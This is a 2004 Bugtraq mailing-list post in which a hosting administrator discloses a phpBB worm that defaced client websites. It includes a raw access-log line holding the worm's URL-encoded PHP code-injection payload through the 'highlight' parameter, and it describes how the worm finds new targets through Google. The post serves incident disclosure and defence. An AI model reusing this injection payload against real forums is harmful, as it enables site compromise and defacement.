Bugtraq mailing list archives
phpBB Worm
From: Shannon Lee <shannon () webhostworks net>
Date: Mon, 20 Dec 2004 15:51:13 -0800
This morning one of our client's sites was found to have been defaced with the words "NeverEverNoSanity WebWorm Generation 9." The defacement appeared to take place on all .html files in the web root trees of multiple virtual hosts on the web server in a very short period of time. After some investigation, we determined that the attacker had gained access via phpbb in a series of crafted URL requests, like so: 64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid=f5 399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr (49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47) %252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252 echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE OMITTED.com/ viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efw rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(11 1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(11 5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%25 2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252ec hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" After checking the phpbb site, it turns out that this is a vulnerability posted the 18th of November, called Hilight; we didn't update to prevent it because the client whose domain it was has their own admin, and we thought he was taking care of phpBB. Oops. The exploit is described here: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 When I copied all these entries out of the log and translated the chr() calls, they turned out to be the attached perl script, which is capable of finding .html files to deface, and then going to google and finding more instances of phpbb to infect. Which makes it a worm. It also tracks itself by generation; we were generation 9. Please find attached the above-mentioned script as well as the series of log entries from access_log. --Shannon
Attachment:
exploit.zip
Description:
Current thread:
- phpBB Worm Shannon Lee (Dec 21)
- Re: phpBB Worm Raymond Dijkxhoorn (Dec 21)
- Re: phpBB Worm Sebastian Wiesinger (Dec 22)
- Re: phpBB Worm William Geoghegan (Dec 23)
- Re: phpBB Worm Anders Henke (Dec 23)
- Re: phpBB Worm Sebastian Wiesinger (Dec 22)
- RE: phpBB Worm Paul Kurczaba (Dec 21)
- Re: phpBB Worm Alexander Klimov (Dec 22)
- <Possible follow-ups>
- Re: phpBB Worm ycw1bh302 (Dec 22)
- Re: phpBB Worm Alvin Packard (Dec 23)
- Re: phpBB Worm Anders Henke (Dec 23)
- RE: phpBB Worm Ofer Shezaf (Dec 23)
(Thread continues...)
- Re: phpBB Worm Raymond Dijkxhoorn (Dec 21)